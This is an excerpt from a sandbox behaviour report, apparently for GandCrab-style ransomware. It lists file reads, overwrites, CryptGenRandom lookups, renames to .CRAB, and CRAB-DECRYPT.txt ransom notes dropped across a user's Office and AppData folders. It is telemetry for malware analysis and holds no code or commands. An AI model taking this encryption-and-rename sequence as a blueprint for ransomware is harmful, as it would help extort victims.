| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK, size = 1048576, size_out = 282 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK, size = 288 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat, size = 1048576, size_out = 63 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat, size = 64 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK, size = 1048576, size_out = 1183 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK, size = 1184 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs, size = 1048576, size_out = 2560 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs, size = 2560 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml, size = 1048576, size_out = 2346 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml, size = 2352 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml, size = 1048576, size_out = 168 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml, size = 176 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\en-US\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\en-US\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, size = 1048576, size_out = 380006 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, size = 380016 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm.CRAB |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Effects\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Effects\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Fonts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Fonts\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx, size = 1048576, size_out = 776190 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx, size = 776192 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx, size = 1048576, size_out = 787354 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx, size = 787360 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx, size = 1048576, size_out = 738429 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx, size = 738432 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76310000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x763310a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx, size = 1048576, size_out = 864810 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx, size = 864816 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx.CRAB |
|
1 | |
